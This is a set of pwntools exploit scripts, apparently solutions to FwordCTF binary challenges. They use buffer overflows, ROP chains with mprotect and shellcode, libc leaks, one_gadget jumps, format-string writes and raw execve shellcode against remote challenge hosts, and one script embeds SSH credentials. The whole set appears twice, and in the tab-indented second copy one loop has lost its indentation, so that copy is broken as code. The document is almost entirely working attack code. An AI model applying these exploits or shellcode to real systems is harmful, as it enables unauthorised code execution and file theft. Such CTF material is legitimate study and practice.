po6ix/blacklist.py

## blacklist.py
from pwn import *

context.arch = 'amd64'

# p = process('./blacklist')
p = remote('blacklist.fword.wtf', 1236)
e = ELF('./blacklist')

mprotect = 0x448CF0
read = 0x447D30
bss_start = 0x4d2000
bss = 0x4d2800

pop_rdi_ret = 0x4017b6
pop_rsi_ret = 0x4024f6
pop_rdx_ret = 0x401db2

pause()
payload = 'a' * 0x40
payload += p64(0)

# mprotect(bss_start, 10000, 7)
payload += p64(pop_rdi_ret)
payload += p64(bss_start)
payload += p64(pop_rsi_ret)
payload += p64(10000)
payload += p64(pop_rdx_ret)
payload += p64(7)
payload += p64(mprotect)

# read(0, bss, 100)
payload += p64(pop_rdi_ret)
payload += p64(0)
payload += p64(pop_rsi_ret)
payload += p64(bss)
payload += p64(pop_rdx_ret)
payload += p64(0x400)
payload += p64(read)

payload += p64(bss)
payload += p64(0)


shellcode = ''
shellcode += shellcraft.pushstr('')
shellcode += shellcraft.mov('rdi', 0x4d2a00)
shellcode += shellcraft.openat(0, 'rdi')
shellcode += shellcraft.mov('rdi', 0x4d2a0a)
shellcode += shellcraft.openat(3, 'rdi')
shellcode += shellcraft.sendfile(1, 4, 0, 1000)


shellcode_asm = asm(shellcode)
shellcode_asm = shellcode_asm.ljust(0x200)
shellcode_asm += '/home/fbi\0' # 0x4d2a00
shellcode_asm += 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacma.txt\0' # 0x4d2a0a

p.sendline(payload)
p.send(shellcode_asm)

p.interactive()

## ez-ret-to-win.py
from pwn import *

s = ssh(user='ctf',host='superez.fword.wtf',port=2222,password='FwOrDAndKahl4FTW')
p = s.run("/bin/bash")
p.sendlineafter('$', './task')
e = ELF('./superez_patched')

# p = process('./superez_patched', shell=True)
# e = ELF('./superez_patched')

payload = '\0' * (0xa8)
# payload += p64(0x400917)
payload += p64(0x400918)

p.sendlineafter('continue:', payload)
p.interactive()

## hello-pwner.py
from pwn import *

p = remote('54.210.217.206', 1240)
e = ELF('./molotov')
libc = ELF('./libc6_2.30-0ubuntu2.2_i386.so')

system = int(p.recvline(), 16)
libc_base = system - libc.symbols['system']
binsh = libc_base + libc.search('/bin/sh\0').next()

info(hex(libc.search('/bin/sh\0').next()))

pr = libc_base + 0xd639e
pppr = libc_base + 0xd639c

info('system: ' + hex(system))
info('binsh: ' + hex(binsh))
info('libc_base: ' + hex(libc_base))
info('pr: ' + hex(pr))
info('pppr: ' + hex(pppr))

payload =  'a' * 0x1c
payload += p32(0)

payload += p32(system)
payload += p32(0)
payload += p32(binsh)
payload += p32(0)
payload += p32(0)
payload += p32(0)

p.sendlineafter(':', payload)
p.interactive()

## numbers.py
from pwn import *

# p = process('./numbers')
p = remote('numbers.fword.wtf', 1237)
e = ELF('./numbers')

p.sendafter('??', '-1')
p.sendafter('??', 'a' * 8 )

p.recvline()
libc_leak = u64(p.recvline()[8:8+6] + '\0\0')
libc_base = libc_leak - 0x42480
one_gadget = libc_base + 328070 # 328070 328163 1064784
info('libc_leak: ' + hex(libc_leak))
info('libc_base: ' + hex(libc_base))
info('one_gadget: ' + hex(one_gadget))

payload = 'a' * 0x40
payload += p64(0)

payload += p64(one_gadget)

pause()
p.sendline()
p.sendafter('??', '-1')
p.sendafter('??', payload )


p.interactive()

## one-piece-remake.py
from pwn import *

# p = process('./one_piece_remake')
p = remote('onepiece.fword.wtf', 1236)
e = ELF('./one_piece_remake')

payload = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"

for i in range(0, len(payload), 4):
    p.sendlineafter('>>', 'gomugomunomi')
    p.sendafter('>>', fmtstr_payload(7, {0x804A038+i:payload[i:i+4]}))

p.sendlineafter('>>', 'run')
p.interactive()

## one_piece.py
from pwn import *

# p = process('./one_piece')
p = remote('onepiece.fword.wtf', 1238)
e = ELF('./one_piece')
libc = ELF('./libc6_2.30-0ubuntu2.1_amd64.so')
# libc = ELF('./libc-2.23.so')

p.sendlineafter('>>', 'read')
p.sendafter(':', 'a' + 'z' * 38 + 'z')

p.sendlineafter('>>', 'gomugomunomi')
pie_leak = int(p.recvline().split(':')[1], 16)
pie_base = pie_leak - 0xa3a

bss = pie_base + 0x202800
read_got = pie_base + e.got['read']
read_plt = pie_base + e.plt['read']
printf_got = pie_base + e.got['printf']
puts_got = pie_base + e.got['puts']
puts_plt = pie_base + e.plt['puts']
ret = pie_base + 0x70e
pop_rdi_ret = pie_base + 0xba3
main_start = pie_base + 0xA3F

target = pie_base + 0x238

info('pie_leak: ' + hex(pie_leak))
info('pie_base: ' + hex(pie_base))
info('puts_got: ' + hex(puts_got))
info('read_got: ' + hex(read_got))
info('ret: ' + hex(ret))
info('pop_rdi_ret: ' + hex(pop_rdi_ret))
pause()
payload = 'z' * 0x30 + p64(0)

payload += p64(pop_rdi_ret)
payload += p64(puts_got)
payload += p64(puts_plt)
payload += p64(main_start)

p.sendlineafter(':', payload)
p.recvline()
puts = u64(p.recvline()[:-1] + '\0\0')
libc_base = puts - libc.symbols['puts']
system = libc_base + libc.symbols['system']
# one_gadget_offset = 283158 # 283158 283242 983716 987463
one_gadget_offset = 1093545 # 945043 945046 945049 1093545
one_gadget = libc_base + one_gadget_offset
info('puts: ' + hex(puts))
info('libc_base: ' + hex(libc_base))
info('system: ' + hex(system))
info('one_gadget: ' + hex(one_gadget))

payload = 'z' * 0x30 + p64(0)
payload += p64(one_gadget)

p.sendlineafter('>>', 'read')
p.sendafter(':', 'a' + 'z' * 38 + 'z')

p.sendlineafter('>>', 'gomugomunomi')
p.recvline()
p.sendlineafter(':', payload)

p.interactive()
	from pwn import *

	context.arch = 'amd64'

	# p = process('./blacklist')
	p = remote('blacklist.fword.wtf', 1236)
	e = ELF('./blacklist')

	mprotect = 0x448CF0
	read = 0x447D30
	bss_start = 0x4d2000
	bss = 0x4d2800

	pop_rdi_ret = 0x4017b6
	pop_rsi_ret = 0x4024f6
	pop_rdx_ret = 0x401db2

	pause()
	payload = 'a' * 0x40
	payload += p64(0)

	# mprotect(bss_start, 10000, 7)
	payload += p64(pop_rdi_ret)
	payload += p64(bss_start)
	payload += p64(pop_rsi_ret)
	payload += p64(10000)
	payload += p64(pop_rdx_ret)
	payload += p64(7)
	payload += p64(mprotect)

	# read(0, bss, 100)
	payload += p64(pop_rdi_ret)
	payload += p64(0)
	payload += p64(pop_rsi_ret)
	payload += p64(bss)
	payload += p64(pop_rdx_ret)
	payload += p64(0x400)
	payload += p64(read)

	payload += p64(bss)
	payload += p64(0)


	shellcode = ''
	shellcode += shellcraft.pushstr('')
	shellcode += shellcraft.mov('rdi', 0x4d2a00)
	shellcode += shellcraft.openat(0, 'rdi')
	shellcode += shellcraft.mov('rdi', 0x4d2a0a)
	shellcode += shellcraft.openat(3, 'rdi')
	shellcode += shellcraft.sendfile(1, 4, 0, 1000)



	shellcode_asm = asm(shellcode)
	shellcode_asm = shellcode_asm.ljust(0x200)
	shellcode_asm += '/home/fbi\0' # 0x4d2a00
	shellcode_asm += 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacma.txt\0' # 0x4d2a0a

	p.sendline(payload)
	p.send(shellcode_asm)

	p.interactive()
	from pwn import *

	s = ssh(user='ctf',host='superez.fword.wtf',port=2222,password='FwOrDAndKahl4FTW')
	p = s.run("/bin/bash")
	p.sendlineafter('$', './task')
	e = ELF('./superez_patched')

	# p = process('./superez_patched', shell=True)
	# e = ELF('./superez_patched')

	payload = '\0' * (0xa8)
	# payload += p64(0x400917)
	payload += p64(0x400918)

	p.sendlineafter('continue:', payload)
	p.interactive()
	from pwn import *

	p = remote('54.210.217.206', 1240)
	e = ELF('./molotov')
	libc = ELF('./libc6_2.30-0ubuntu2.2_i386.so')

	system = int(p.recvline(), 16)
	libc_base = system - libc.symbols['system']
	binsh = libc_base + libc.search('/bin/sh\0').next()

	info(hex(libc.search('/bin/sh\0').next()))

	pr = libc_base + 0xd639e
	pppr = libc_base + 0xd639c

	info('system: ' + hex(system))
	info('binsh: ' + hex(binsh))
	info('libc_base: ' + hex(libc_base))
	info('pr: ' + hex(pr))
	info('pppr: ' + hex(pppr))

	payload = 'a' * 0x1c
	payload += p32(0)

	payload += p32(system)
	payload += p32(0)
	payload += p32(binsh)
	payload += p32(0)
	payload += p32(0)
	payload += p32(0)

	p.sendlineafter(':', payload)
	p.interactive()
	from pwn import *

	# p = process('./numbers')
	p = remote('numbers.fword.wtf', 1237)
	e = ELF('./numbers')

	p.sendafter('??', '-1')
	p.sendafter('??', 'a' * 8 )

	p.recvline()
	libc_leak = u64(p.recvline()[8:8+6] + '\0\0')
	libc_base = libc_leak - 0x42480
	one_gadget = libc_base + 328070 # 328070 328163 1064784
	info('libc_leak: ' + hex(libc_leak))
	info('libc_base: ' + hex(libc_base))
	info('one_gadget: ' + hex(one_gadget))

	payload = 'a' * 0x40
	payload += p64(0)

	payload += p64(one_gadget)

	pause()
	p.sendline()
	p.sendafter('??', '-1')
	p.sendafter('??', payload )


	p.interactive()
	from pwn import *

	# p = process('./one_piece_remake')
	p = remote('onepiece.fword.wtf', 1236)
	e = ELF('./one_piece_remake')

	payload = "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80"

	for i in range(0, len(payload), 4):
	p.sendlineafter('>>', 'gomugomunomi')
	p.sendafter('>>', fmtstr_payload(7, {0x804A038+i:payload[i:i+4]}))

	p.sendlineafter('>>', 'run')
	p.interactive()
	from pwn import *

	# p = process('./one_piece')
	p = remote('onepiece.fword.wtf', 1238)
	e = ELF('./one_piece')
	libc = ELF('./libc6_2.30-0ubuntu2.1_amd64.so')
	# libc = ELF('./libc-2.23.so')

	p.sendlineafter('>>', 'read')
	p.sendafter(':', 'a' + 'z' * 38 + 'z')

	p.sendlineafter('>>', 'gomugomunomi')
	pie_leak = int(p.recvline().split(':')[1], 16)
	pie_base = pie_leak - 0xa3a

	bss = pie_base + 0x202800
	read_got = pie_base + e.got['read']
	read_plt = pie_base + e.plt['read']
	printf_got = pie_base + e.got['printf']
	puts_got = pie_base + e.got['puts']
	puts_plt = pie_base + e.plt['puts']
	ret = pie_base + 0x70e
	pop_rdi_ret = pie_base + 0xba3
	main_start = pie_base + 0xA3F

	target = pie_base + 0x238

	info('pie_leak: ' + hex(pie_leak))
	info('pie_base: ' + hex(pie_base))
	info('puts_got: ' + hex(puts_got))
	info('read_got: ' + hex(read_got))
	info('ret: ' + hex(ret))
	info('pop_rdi_ret: ' + hex(pop_rdi_ret))
	pause()
	payload = 'z' * 0x30 + p64(0)

	payload += p64(pop_rdi_ret)
	payload += p64(puts_got)
	payload += p64(puts_plt)
	payload += p64(main_start)

	p.sendlineafter(':', payload)
	p.recvline()
	puts = u64(p.recvline()[:-1] + '\0\0')
	libc_base = puts - libc.symbols['puts']
	system = libc_base + libc.symbols['system']
	# one_gadget_offset = 283158 # 283158 283242 983716 987463
	one_gadget_offset = 1093545 # 945043 945046 945049 1093545
	one_gadget = libc_base + one_gadget_offset
	info('puts: ' + hex(puts))
	info('libc_base: ' + hex(libc_base))
	info('system: ' + hex(system))
	info('one_gadget: ' + hex(one_gadget))

	payload = 'z' * 0x30 + p64(0)
	payload += p64(one_gadget)

	p.sendlineafter('>>', 'read')
	p.sendafter(':', 'a' + 'z' * 38 + 'z')

	p.sendlineafter('>>', 'gomugomunomi')
	p.recvline()
	p.sendlineafter(':', payload)

	p.interactive()